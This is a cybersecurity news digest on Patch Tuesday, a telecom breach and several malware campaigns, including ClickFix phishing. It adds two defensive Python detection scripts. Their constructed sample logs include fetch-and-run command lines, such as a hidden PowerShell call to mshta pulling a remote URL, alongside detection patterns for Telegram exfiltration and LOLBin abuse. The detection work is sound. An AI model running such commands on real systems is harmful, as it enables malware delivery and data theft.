MSP cybersecurity news digest, March 18, 2025

Microsoft March 2025 Patch Tuesday addresses 57 security vulnerabilities, including six zero-day flaws


Microsoft's March 2025 Patch Tuesday addressed 57 security vulnerabilities, including six actively exploited zero-day flaws. Six of the 57 were rated "critical", and all six critical issues are remote code execution vulnerabilities.

The breakdown of the vulnerabilities is as follows: 23 elevation of privilege, three security feature bypass, 23 remote code execution, four information disclosure, one denial of service and three spoofing vulnerabilities. Notably, these figures exclude Mariner flaws and 10 Microsoft Edge vulnerabilities that were resolved earlier in the month.

The six actively exploited zero-day vulnerabilities addressed include issues in the Windows Win32 Kernel Subsystem, NTFS, Fast FAT File System Driver and Microsoft Management Console, among others. Furthermore, a publicly disclosed zero-day vulnerability in Microsoft Access was also patched.


Japanese telecom corporation NTT Communications suffers breach of nearly 18,000 customers' data


In early February 2025, Japanese telecom provider NTT Communications Corporation (NTT) discovered unauthorized access to its internal systems, resulting in a data breach affecting nearly 18,000 corporate customers.

The compromised 'Order Information Distribution System' contained sensitive information such as customer names, representative names, contract numbers, phone numbers, email addresses, physical addresses and service usage details. Upon detection, NTT promptly restricted access to the affected system and disconnected another compromised device to prevent further unauthorized access.

The company stated that individual consumer data was not affected and chose to inform impacted corporate clients through a public announcement rather than through personalized notifications. This incident underscores the persistent cybersecurity challenges faced by major telecommunications providers.


Colombian institutions attacked by threat actor Blind Eagle using NTLM flaw, RATs and GitHub-based attacks


Blind Eagle, a sophisticated threat actor, has been targeting Colombian institutions with a series of high-impact campaigns since November 2024. One campaign alone affected more than 1,600 victims.

The first stage of the attack chain relies on social engineering, particularly spear-phishing emails, to gain access and deliver malicious payloads such as Remcos RAT. In the second stage, Blind Eagle exploited a known Microsoft Windows vulnerability (CVE-2024-43451), highlighting how quickly the group adapts: it was abusing the flaw just days after the patch was released, against systems that had not yet applied the update.

The third stage involved using the HeartCrypt tool to pack a variant of PureCrypter, which in turn was responsible for deploying Remcos RAT. The packing protected the malicious executables from detection, and the group distributed its payloads via Bitbucket and GitHub, moving beyond traditional file-sharing platforms like Google Drive.


900 victims claimed by "Desert Dexter" via modified version of AsyncRAT malware


Since September 2024, the Middle East and North Africa have been targeted by a campaign delivering a modified version of AsyncRAT malware.

Researchers link this campaign to the region’s geopolitical climate, noting that attackers distribute malware through social media and legitimate file-sharing platforms. The operation, attributed to the threat actor "Desert Dexter," has affected approximately 900 victims, mainly in Libya, Saudi Arabia, Egypt, Turkey, the UAE, Qatar and Tunisia.

Attackers use temporary Facebook accounts to post advertisements containing malicious links that lead users to a malware-laced RAR archive. This archive executes a PowerShell script that establishes persistence, gathers system data, exfiltrates it to a Telegram bot, and ultimately deploys AsyncRAT by injecting it into an executable. Although the origin of Desert Dexter remains unknown, Arabic-language comments in the code and links to a Telegram channel suggest possible ties to Libya.
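One way a defender can hunt for the Telegram-bot exfiltration step described above in web-proxy logs, as an added example that is not from the original report. The log format, client addresses and bot tokens are constructed; the detection keys on the Bot API path shape (`/bot<token>/<method>`), alerts only on methods that carry data out, and redacts the token before it lands in an alert.

```python
import re

# Constructed proxy log lines (not real traffic): <ts> <client> <http-method> <url> "<user-agent>"
SAMPLE_PROXY_LOG = [
    '2025-03-12T10:02:15Z 10.0.0.21 POST https://api.telegram.org/bot1234567890:AAExampleTokenValue-x1/sendDocument "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WindowsPowerShell/5.1.19041.4522"',
    '2025-03-12T10:03:40Z 10.0.0.22 GET https://web.telegram.org/a/ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/123.0"',
    '2025-03-12T10:05:01Z 10.0.0.21 POST https://api.telegram.org/bot1234567890:AAExampleTokenValue-x1/sendMessage "Mozilla/5.0 (Windows NT 10.0; Win64; x64) WindowsPowerShell/5.1.19041.4522"',
    '2025-03-12T10:06:30Z 10.0.0.23 GET https://api.telegram.org/bot9876543210:AAOtherExampleToken/getMe "curl/8.4.0"',
]

LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')
# Bot API URLs carry the bot token in the path: /bot<id>:<secret>/<method>
BOT_URL_RE = re.compile(r"^https?://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/([A-Za-z]+)", re.IGNORECASE)
# Methods that move data off the host; getMe/getUpdates on their own are not exfiltration.
EXFIL_METHODS = {"senddocument", "sendmessage", "sendphoto"}
# User-agent fragments typical of scripts rather than a person using Telegram in a browser.
SCRIPT_UA_MARKERS = ("windowspowershell", "powershell", "curl/", "python-requests")

def detect_telegram_exfil(lines):
    """Return one alert dict per proxy line that looks like Bot API exfiltration."""
    alerts = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, client, _http_method, url, ua = m.groups()
        bot = BOT_URL_RE.match(url)
        if not bot or bot.group(2).lower() not in EXFIL_METHODS:
            continue
        token, api_method = bot.groups()
        # A script-like user agent on an exfil-capable method matches the PowerShell stage of this chain.
        severity = "high" if any(k in ua.lower() for k in SCRIPT_UA_MARKERS) else "medium"
        alerts.append({
            "ts": ts, "client": client, "method": api_method, "severity": severity,
            "url": url.replace(token, "<token-redacted>"),  # never copy a live token into a ticket
        })
    return alerts

if __name__ == "__main__":
    for alert in detect_telegram_exfil(SAMPLE_PROXY_LOG):
        print(alert)
```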


Fake Booking.com emails used in ClickFix phishing campaign attacking hospitality sector


Researchers have exposed an ongoing phishing campaign targeting the hospitality sector by impersonating Booking.com and using a social engineering technique called ClickFix to deliver credential-stealing malware.

The campaign, tracked as Storm-1865 and active since December 2024, aims to commit financial fraud and theft against hospitality professionals across North America, Oceania, Europe and Asia. Attackers send deceptive emails claiming to be from Booking.com, often mentioning negative guest reviews and including links or PDF attachments that appear to lead to the legitimate booking site. The links instead lead to counterfeit CAPTCHA verification pages that mimic Booking.com and trick users into opening the Windows Run window with a keyboard shortcut and executing a command pasted there.

This command leverages the legitimate mshta.exe binary to drop a payload comprising various malware families such as XWorm, Lumma stealer, VenomRAT, AsyncRAT, Danabot and NetSupport RAT. Previous iterations of Storm-1865 have also targeted e-commerce buyers. Security experts note that the rapid adoption of the ClickFix technique marks an evolution in social engineering, as it exploits user trust to bypass automated defenses and is now even being embraced by nation-state groups.
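A defender's view of the ClickFix step described above: an added example, not from the original report, that runs a simple rule over constructed process-creation events (Sysmon-style, simplified to one pipe-delimited line each). Because the victim pastes the command into Win+R, the launched binary is a child of explorer.exe; the rule flags LOLBins started that way with a remote URL on the command line, and treats mshta.exe fetching remote content as the highest-severity match while leaving local .hta usage alone.

```python
import re
from typing import Optional

# Constructed sample events (not real telemetry): ts|host=..|parent=..|image=..|cmd=..
SAMPLE_EVENTS = [
    "2025-03-12T09:14:03Z|host=FD-01|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\mshta.exe|cmd=mshta https://verify.example.invalid/captcha",
    "2025-03-12T09:18:27Z|host=FD-01|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\mshta.exe|cmd=mshta C:\\Users\\Public\\help.hta",
    "2025-03-12T09:25:40Z|host=FD-02|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\notepad.exe|cmd=notepad.exe",
    '2025-03-12T09:31:07Z|host=FD-02|parent=C:\\Windows\\explorer.exe|image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|cmd=powershell -w hidden -c "mshta http://verify.example.invalid/c"',
]

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Binaries a Run-window one-liner typically uses to pull and run remote content.
RUN_DIALOG_LOLBINS = {"mshta.exe", "powershell.exe", "cmd.exe", "curl.exe", "wscript.exe", "cscript.exe"}

def parse_event(line: str) -> dict:
    """Split 'ts|key=value|key=value' into a dict; the timestamp is stored under 'ts'."""
    ts, *fields = line.split("|")
    ev = {"ts": ts}
    for field in fields:
        key, _, value = field.partition("=")
        ev[key] = value
    return ev

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]

def classify(ev: dict) -> Optional[str]:
    """Return a severity when the event matches the ClickFix Run-window pattern, else None."""
    parent = basename(ev.get("parent", "")).lower()
    image = basename(ev.get("image", "")).lower()
    cmd = ev.get("cmd", "")
    if parent != "explorer.exe" or image not in RUN_DIALOG_LOLBINS:
        return None          # Win+R launches land under explorer.exe; other parents are out of scope here
    if not URL_RE.search(cmd):
        return None          # a local .hta or script is routine admin/vendor usage; do not alert
    if image == "mshta.exe" or "mshta" in cmd.lower():
        return "high"        # mshta pulling remote content is the exact lure behaviour in Storm-1865
    return "medium"

def scan(lines):
    """Return (severity, host, image basename, timestamp) for every matching event."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        severity = classify(ev)
        if severity:
            alerts.append((severity, ev.get("host", "?"), basename(ev.get("image", "")), ev["ts"]))
    return alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```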